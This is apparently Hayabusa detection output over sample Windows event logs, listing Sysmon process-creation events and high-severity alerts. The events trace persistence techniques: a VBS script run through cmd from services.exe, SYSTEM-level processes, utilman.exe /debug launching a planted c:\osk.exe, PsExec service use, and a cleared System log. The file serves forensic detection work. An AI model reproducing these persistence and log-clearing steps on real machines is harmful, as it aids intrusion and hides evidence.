C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent 
Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: 
C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : 
Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 